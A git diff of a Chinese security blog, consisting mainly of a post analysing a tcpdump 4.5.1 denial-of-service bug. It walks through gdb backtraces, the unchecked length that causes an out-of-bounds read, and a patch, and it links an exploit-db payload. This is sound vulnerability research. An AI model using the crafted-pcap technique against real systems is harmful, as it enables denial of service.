 <p>从崩溃信息来看，出错位置为s2 = <em>cp++;崩溃原因为SIGSEGV，即进程执行了一段无效的内存引用或发生段错误。可以看到，问题出现在./print-ascii.c:91，而且此时指针读取[ebx+ebp</em>2+0x1]的内容，可能是越界读取造成的崩溃。<br>再结合源码信息可知，指针cp在自加的过程中访问到了一个没有权限访问的地址，因为这是写在一个while循环里，也就是是说nshorts的值偏大，再看nshorts怎么来的，由此nshorts = length / sizeof(u_short);可知，可能是函数传入的参数length没有控制大小导致，因此目标就是追踪length是如何传入的。<br>我们通过bt回溯一下调用情况。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1.	gdb-peda$ bt</span><br><span class="line">2.	#0  hex_and_ascii_print_with_offset (ident=0x80c04af &quot;\n\t&quot;, cp=0x8204000 &lt;error: Cannot access memory at address 0x8204000&gt;,</span><br><span class="line">3.	    length=0xfffffff3, oset=0x20c40) at ./print-ascii.c:91</span><br><span class="line">4.	#1  0x08053e26 in hex_and_ascii_print (ident=0x80c04af &quot;\n\t&quot;, cp=0x81e33bd &quot;&quot;, length=0xfffffff3) at ./print-ascii.c:127</span><br><span class="line">5.	#2  0x08051e7d in ieee802_15_4_if_print (ndo=0x81e1320 &lt;Gndo&gt;, h=0xbfffe40c, p=&lt;optimized out&gt;) at ./print-802_15_4.c:180</span><br><span class="line">6.	#3  0x080a0aea in print_packet (user=0xbfffe4dc &quot; \023\036\b\300\034\005\b\001&quot;, h=0xbfffe40c, sp=0x81e33a8 &quot;@\377&quot;)</span><br><span class="line">7.	    at ./tcpdump.c:1950</span><br><span class="line">8.	#4  0xb7fa3468 in ?? () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">9.	#5  0xb7f940e3 in pcap_loop () from /usr/lib/i386-linux-gnu/libpcap.so.0.8</span><br><span class="line">10.	#6  0x0804b3dd in main (argc=0x3, argv=0xbffff6c4) at ./tcpdump.c:1569</span><br><span class="line">11.	#7  0xb7de9637 in __libc_start_main (main=0x804a4c0 &lt;main&gt;, argc=0x3, argv=0xbffff6c4, init=0x80b1230 &lt;__libc_csu_init&gt;,</span><br><span class="line">12.	    fini=0x80b1290 &lt;__libc_csu_fini&gt;, rtld_fini=0xb7fea880 &lt;_dl_fini&gt;, stack_end=0xbffff6bc) at ../csu/libc-start.c:291</span><br><span class="line">13.	#8  0x0804c245 in _start ()</span><br></pre></td></tr></table></figure></p>
 <p>函数调用流程<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">pcap_loop</span><br><span class="line">  |----print_packet</span><br><span class="line">                 |-----hex_and_ascii_print</span><br><span class="line">                                |--------  hex_and_ascii_print_with_offset</span><br></pre></td></tr></table></figure></p>
 <p>由此可见，从main函数开始了一连串函数调用，git源码下来看看。<br>tcpdump.c找到pcap_loop调用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">1.	    do &#123;</span><br><span class="line">2.	        status = pcap_loop(pd, cnt, callback, pcap_userdata);</span><br><span class="line">3.	        if (WFileName == NULL) &#123;</span><br><span class="line">4.	            /*</span><br><span class="line">5.	             * We&apos;re printing packets.  Flush the printed output,</span><br><span class="line">6.	             * so it doesn&apos;t get intermingled with error output.</span><br><span class="line">7.	             */</span><br><span class="line">8.	            if (status == -2) &#123;</span><br><span class="line">9.	                /*</span><br><span class="line">10.	                 * We got interrupted, so perhaps we didn&apos;t</span><br><span class="line">11.	                 * manage to finish a line we were printing.</span><br><span class="line">12.	                 * Print an extra newline, just in case.</span><br><span class="line">13.	                 */</span><br><span class="line">14.	                putchar(&apos;n&apos;);</span><br><span class="line">15.	            &#125;</span><br><span class="line">16.	            (void)fflush(stdout);</span><br><span class="line">17.	        &#125;</span><br></pre></td></tr></table></figure></p>
@ -462,12 +462,12 @@
 <p>从源码和调试信息可以看到libpcap在处理不正常包时不严谨，导致包的头长度hdrlen竟然大于捕获包长度caplen，并且在处理时又没有相关的判断。hdrlen和caplen都是非负整数，导致caplen==0xfffffff3过长。<br>继续跟进hex_and_asciii_print(ndo_default_print)</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">1.	void</span><br><span class="line">2.	hex_and_ascii_print(register const char *ident, register const u_char *cp,</span><br><span class="line">3.	    register u_int length)</span><br><span class="line">4.	&#123;</span><br><span class="line">5.	    hex_and_ascii_print_with_offset(ident, cp, length, 0);</span><br><span class="line">6.	&#125;</span><br><span class="line"></span><br><span class="line">其中length==0xfffffff3，继续执行</span><br><span class="line">1.	void</span><br><span class="line">2.	hex_print_with_offset(register const char *ident, register const u_char *cp, register u_int length,</span><br><span class="line">3.	              register u_int oset)</span><br><span class="line">4.	&#123;</span><br><span class="line">5.	    register u_int i, s;</span><br><span class="line">6.	    register int nshorts;</span><br><span class="line">7.</span><br><span class="line">8.	    nshorts = (u_int) length / sizeof(u_short);</span><br><span class="line">9.	    i = 0;</span><br><span class="line">10.	    while (--nshorts &gt;= 0) &#123;</span><br><span class="line">11.	        if ((i++ % 8) == 0) &#123;</span><br><span class="line">12.	            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">13.	            oset += HEXDUMP_BYTES_PER_LINE;</span><br><span class="line">14.	        &#125;</span><br><span class="line">15.	        s = *cp++;   &lt;======= 抛出错误位置</span><br><span class="line">16.	        (void)printf(&quot; %02x%02x&quot;, s, *cp++);</span><br><span class="line">17.	    &#125;</span><br><span class="line">18.	    if (length &amp; 1) &#123;</span><br><span class="line">19.	        if ((i % 8) == 0)</span><br><span class="line">20.	            (void)printf(&quot;%s0x%04x: &quot;, ident, oset);</span><br><span class="line">21.	        (void)printf(&quot; %02x&quot;, *cp);</span><br><span class="line">22.	    &#125;</span><br><span class="line">nshorts=(u_int) length / sizeof(u_short) =&gt; nshorts=0xfffffff3/2=‭7FFFFFF9‬‬‬‬</span><br></pre></td></tr></table></figure>
 <p>但数据包数据没有这么长，导致了crash。</p>
-<h3 id="3-内存分析"><a href="#3-内存分析" class="headerlink" title="3.内存分析"></a>3.内存分析</h3><p>仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.	gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2.	0x8203fdd:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">3.	0x8203fed:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">4.	0x8203ffd:      Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
+<h3 id="内存分析"><a href="#内存分析" class="headerlink" title="内存分析"></a>内存分析</h3><p>仔细分析之后发现，通过len判断的这个长度并没有进行控制，如果是自己构造的一个超长len的数据包，则会连续读取到不可估计的值。<br>通过查看epx的值来看一下这个内存到底开辟到什么位置<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.	gdb-peda$ x/10000000x 0x81e33bd</span><br><span class="line">2.	0x8203fdd:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">3.	0x8203fed:      0x00000000      0x00000000      0x00000000      0x00000000</span><br><span class="line">4.	0x8203ffd:      Cannot access memory at address 0x8204000</span><br></pre></td></tr></table></figure></p>
 <p>可以看到，到达0x 8204000附近的时候，就是无法读取的无效地址了，那么初始值为0x 81e33bd，用两个值相减。0x 8204000-0x 81e33bd = 0x 20c40，因为ebx+ebp*2+0x1一次读取两个字节，那么循环计数器就要除以2，最后结果为0x 10620。<br>来看一下到达拒绝服务位置读取的长度：EBX: 0x81e33bd –&gt; 0x0；EBP: 0x10621；<br>EBP刚好为10621。正是不可读取内存空间的地址，因此造成拒绝服务。</p>
-<h3 id="4-漏洞总结"><a href="#4-漏洞总结" class="headerlink" title="4.漏洞总结"></a>4.漏洞总结</h3><p>总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。</p>
+<h3 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h3><p>总结一下整个漏洞触发过程，首先tcpdump会读取恶意构造的pcap包，在构造pcap包的时候，设置一个超长的数据包长度，tcpdump会根据len的长度去读取保存在内存空间数据包的内容，当引用到不可读取内存位置时，会由于引用不可读指针，造成拒绝服务漏洞。</p>
-<h2 id="五、漏洞修补"><a href="#五、漏洞修补" class="headerlink" title="五、漏洞修补"></a>五、漏洞修补</h2><p>Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.	caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;</span><br><span class="line">2.	if (length &gt; caplength)</span><br><span class="line">3.	    length = caplength;</span><br><span class="line">4.	nshorts = length / sizeof(u_short);</span><br><span class="line">5.	i = 0;</span><br><span class="line">6.	hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7.	while (--nshorts &gt;= 0) &#123;</span><br><span class="line">8.	    ...</span><br><span class="line">9.	&#125;</span><br></pre></td></tr></table></figure></p>
+<h2 id="漏洞修补"><a href="#漏洞修补" class="headerlink" title="漏洞修补"></a>漏洞修补</h2><p>Libpcap依然是apt安装的默认版本，tcpdump使用4.7 .0-bp版本<br>在hex_and_ascii_print_with_offset中增加对caplength的判断<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1.	caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;</span><br><span class="line">2.	if (length &gt; caplength)</span><br><span class="line">3.	    length = caplength;</span><br><span class="line">4.	nshorts = length / sizeof(u_short);</span><br><span class="line">5.	i = 0;</span><br><span class="line">6.	hsp = hexstuff; asp = asciistuff;</span><br><span class="line">7.	while (--nshorts &gt;= 0) &#123;</span><br><span class="line">8.	    ...</span><br><span class="line">9.	&#125;</span><br></pre></td></tr></table></figure></p>
 <p>可以看到执行完caplength = (ndo-&gt;ndo_snapend &gt;= cp) ? ndo-&gt;ndo_snapend - cp : 0;，caplength为0，继续执行，可以推出length同样为0，到这里已经不会发生错误了。</p>
-<p>参考<br><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>
+<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="https://www.exploit-db.com/exploits/39875/" target="_blank" rel="noopener">exploit-db payload</a><br><a href="https://whereisk0shl.top/post/2016-10-23-1" target="_blank" rel="noopener">WHEREISK0SHL分析博客</a><br><a href="https://github.com/the-tcpdump-group" target="_blank" rel="noopener">libpcap/tcpdump源码</a></p>
    </div>
@ -710,7 +710,7 @@
-              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#一、Tcpdump介绍"><span class="nav-number">1.1.</span> <span class="nav-text">一、Tcpdump介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二、分析环境"><span class="nav-number">1.2.</span> <span class="nav-text">二、分析环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#三、漏洞复现"><span class="nav-number">1.3.</span> <span class="nav-text">三、漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-编译安装tcpdump"><span class="nav-number">1.3.1.</span> <span class="nav-text">1.编译安装tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-生成payload（来自exploit-db-payload）"><span class="nav-number">1.3.2.</span> <span class="nav-text">2.生成payload（来自exploit-db payload）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#四、崩溃分析"><span class="nav-number">1.4.</span> <span class="nav-text">四、崩溃分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-pcap包格式"><span class="nav-number">1.4.1.</span> <span class="nav-text">1.pcap包格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-gdb调试"><span class="nav-number">1.4.2.</span> <span class="nav-text">2.gdb调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-内存分析"><span class="nav-number">1.4.3.</span> <span class="nav-text">3.内存分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-漏洞总结"><span class="nav-number">1.4.4.</span> <span class="nav-text">4.漏洞总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#五、漏洞修补"><span class="nav-number">1.5.</span> <span class="nav-text">五、漏洞修补</span></a></li></ol></li></ol></div>
+              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#TCPDUMP-4-5-1-拒绝服务攻击漏洞分析"><span class="nav-number">1.</span> <span class="nav-text">TCPDUMP 4.5.1 拒绝服务攻击漏洞分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Tcpdump介绍"><span class="nav-number">1.1.</span> <span class="nav-text">Tcpdump介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析环境"><span class="nav-number">1.2.</span> <span class="nav-text">分析环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-number">1.3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#编译安装tcpdump"><span class="nav-number">1.3.1.</span> <span class="nav-text">编译安装tcpdump</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成payload（来自exploit-db-payload）"><span class="nav-number">1.3.2.</span> <span class="nav-text">生成payload（来自exploit-db payload）</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#崩溃分析"><span class="nav-number">1.4.</span> <span class="nav-text">崩溃分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#pcap包格式"><span class="nav-number">1.4.1.</span> <span class="nav-text">pcap包格式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#gdb调试"><span class="nav-number">1.4.2.</span> <span class="nav-text">gdb调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#内存分析"><span class="nav-number">1.4.3.</span> <span class="nav-text">内存分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞总结"><span class="nav-number">1.4.4.</span> <span class="nav-text">漏洞总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞修补"><span class="nav-number">1.5.</span> <span class="nav-text">漏洞修补</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">1.6.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
          </div>
--- a/baidusitemap.xml
+++ b/baidusitemap.xml
@ -1,11 +1,14 @@
 <?xml version="1.0" encoding="UTF-8"?>
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
-    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
+    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
    <lastmod>2019-03-23</lastmod>
  </url>  <url>
    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
    <lastmod>2019-03-23</lastmod>
  </url>  <url>
    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
    <lastmod>2019-03-23</lastmod>
  </url>  <url>
    <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
    <lastmod>2019-03-22</lastmod>
@ -15,9 +18,6 @@
  </url>  <url>
    <loc>https://cool-y.github.io/2019/03/16/%E5%B0%8F%E7%B1%B3%E5%9B%BA%E4%BB%B6%E5%B7%A5%E5%85%B7mkxqimage/</loc>
    <lastmod>2019-03-22</lastmod>
  </url>  <url>
    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
    <lastmod>2019-03-22</lastmod>
  </url>  <url>
    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
    <lastmod>2019-03-22</lastmod>
--- a/index.html
+++ b/index.html
@ -986,8 +986,8 @@
-          TCPDUMP 4.5.1 拒绝服务攻击漏洞分析一、Tcpdump介绍
+          TCPDUMP 4.5.1 拒绝服务攻击漏洞分析Tcpdump介绍
-tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac
+tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包。tcpdump 适用于大多数的类Unix系统 操作系统：包括Linux、Solaris、BSD、Mac O
          ...
          <!--noindex-->
          <div class="post-button text-center">
@ -1174,9 +1174,9 @@ tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和
          论文来源：USENIX SECURITY 2018下载：原文pdf中文slides
-论文解读1.    概要：
+论文解读概要：
 物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。
-物联网设备的发现是表征，监控和保护这些设备的先决条件。然
+物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备
          ...
          <!--noindex-->
          <div class="post-button text-center">
@ -1362,15 +1362,15 @@ tcpdump 是一个运行在命令行下的嗅探工具。它允许用户拦截和
-          基于python语言的BIBA模型图形界面实现一、实验目的：
+          基于python语言的BIBA模型图形界面实现实验目的：
 查阅资料，了解biba安全模型的相关知识
 通过编程实现基于biba模型的完整性访问控制，进一步掌握biba模型的规则
 使用python语言实现，熟练pyqt的图形界面设计方法
-二、实验环境：
+实验环境：
 操作系统：Windows10
-工具版本：p
+工具版本：pytho
          ...
          <!--noindex-->
          <div class="post-button text-center">
--- a/search.xml
+++ b/search.xml
--- a/sitemap.xml
+++ b/sitemap.xml
@ -2,16 +2,23 @@
 <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
-    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
+    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
-    <lastmod>2019-03-23T04:41:58.890Z</lastmod>
+    <lastmod>2019-03-23T04:45:31.936Z</lastmod>
  </url>
  <url>
    <loc>https://cool-y.github.io/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</loc>
-    <lastmod>2019-03-23T04:22:28.568Z</lastmod>
+    <lastmod>2019-03-23T04:44:43.410Z</lastmod>
  </url>
  <url>
    <loc>https://cool-y.github.io/2018/12/25/TCPDUMP%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%94%BB%E5%87%BB%E6%BC%8F%E6%B4%9E/</loc>
    <lastmod>2019-03-23T04:44:22.487Z</lastmod>
  </url>
@ -43,13 +50,6 @@
  </url>
  <url>
    <loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc>
    <lastmod>2019-03-22T09:59:29.078Z</lastmod>
  </url>
  <url>
    <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>